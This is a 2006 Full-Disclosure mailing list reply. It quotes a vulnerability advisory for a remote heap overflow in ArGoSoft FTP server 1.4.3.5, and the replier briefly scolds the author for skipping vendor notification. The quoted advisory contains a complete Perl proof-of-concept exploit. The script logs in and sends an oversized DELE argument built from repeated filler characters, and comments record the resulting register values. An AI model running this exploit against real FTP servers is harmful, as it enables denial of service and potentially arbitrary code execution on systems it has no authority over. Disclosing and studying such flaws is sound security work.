[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <4400BEB9.102@heapoverflow.com>
Date: Sat Feb 25 20:32:04 2006
From: ad at heapoverflow.com (ad@...poverflow.com)
Subject: ArGoSoft FTP server remote heap overflow
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
you forgot to message the programmer of it before the public
/slap on you
;->
Jerome Athias wrote:
> -- Title: ArGoSoft FTP server remote heap overflow
>
> -- Affected Products: ArGoSoft FTP server 1.4.3.5 (current) and
> prior
>
> -- Affected Vendor: ArGoSoft - http://www.argosoft.com
>
> -- Impact: DoS, Arbitrary Code Execution
>
> -- Where:
>> From remote
>
> -- Type: Heap Overflow
>
> -- Vulnerability Details: A remote attacker with valid credentials
> is able to trigger a heap overwrite in ArgoSoft FTP server. The bug
> occurs by providing a long argument to the DELE command. This
> vulnerability can allow remote attackers to execute arbitrary code
> or launch a denial of service attack.
>
> -- Credit: This vulnerability was discovered by Jerome Athias.
> https://www.securinfos.info/english/
>
>
>
>
> #!/usr/bin/perl
>
> # ---------------------------------------------------- # #
> ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server # # Jerome
> Athias # #
> ---------------------------------------------------- #
>
> use Net::FTP;
>
> # geting data $host = @ARGV[0]; $port = @ARGV[1]; $debug =
> @ARGV[2]; $user = @ARGV[3]; $pass = @ARGV[4];
>
> # ===========
>
> if (($host) && ($port)) {
>
> # make exploit string $exploit_string = "DELE "; $exploit_string .=
> "A" x 2041; $exploit_string .= "B" x 4; $exploit_string .= "C" x
> 1026;
>
> # On Win2K SP4 FR: # EAX 42424241 # ECX 43434343 # EDX
> 43434342 # EBX 43434B73
>
> # ===================
>
> print "Trying to connect to $host:$port\n"; $sock =
> Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug=> $debug)
> or die "[-] Connection failed\n"; print "[+] Connect OK!\n"; print
> "Logging...\n"; if (!$user) { $user = "test"; $pass = "test"; }
> $sock->login($user, $pass); $answer = $sock->message; print
> "Sending string...\n"; $sock->quot($exploit_string); } else { print
> "ArgoSoft FTP Server - PoC
> Exploit\nhttps://www.securinfos.info\n\nUsing: $0 host port
> username password [debug: 1 or 0]\n\n"; }
> _______________________________________________ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>
>
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
iQIVAwUBRAC+uK+LRXunxpxfAQK6Gw//U+rWA2lZwtNSF5ZUyXgPP7RaWwiFfdNP
pLG3LjxGhj5nVvjbf5MDS3pbTHc09sCMXB/rapH1UJhYwvRva7Bc7Wp83TJrmMgg
8qOrKl269v/3Mv8VBZ3j4arxYVPp+JxEAK6HCNndOvgCKbhiZUVodJh45OWsa4zW
b1N85Shxfw7Zv+Jb0vf4eY05lnzu7OgHxPOGsykaWTvtNtlZZMuxorGBUeL1lJmz
s924HwIyKQnpZAmzSbXcBACPVBpqHR4WLRU6dyJkekt4lU0F80lsr5+qDsv9IVsA
S8phar6sbo+VtaxSTh8Q9tK4NhI3WaYuKh9SRZ6ahniXN/69fqSnJSbDFdSBEQib
12NhjoiHPTSyAv1l2SdccRiRjtik6StMQjkbe9pgf3WGGerzXZuk4ckUFVblSpXR
OW9Zrn1W11pPzcwI+laVUTFEmyTdWMh+yU1yQIPliu2G1IbsuBmXYsMj/5vLIDhj
rCY/PopBtrI3/np+XN1Pq8mHwUwUeWw01K2kir7QUMNmn32LIA7UUjaACoEukINy
eC8hVXoAOOc/ZUmr9Mfs391tdEdnO4ufOamTDwJ7KG/Ngxn54ic+vmIkyl3aUO3Q
ZXeSKe1igZ9dEDJWSYhfyj8bgEXQcA4LhLgwCHXC150Ehp4d/1YQo3qIFBDrMt3m
KIjI6zWxH10=
=bA3R
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists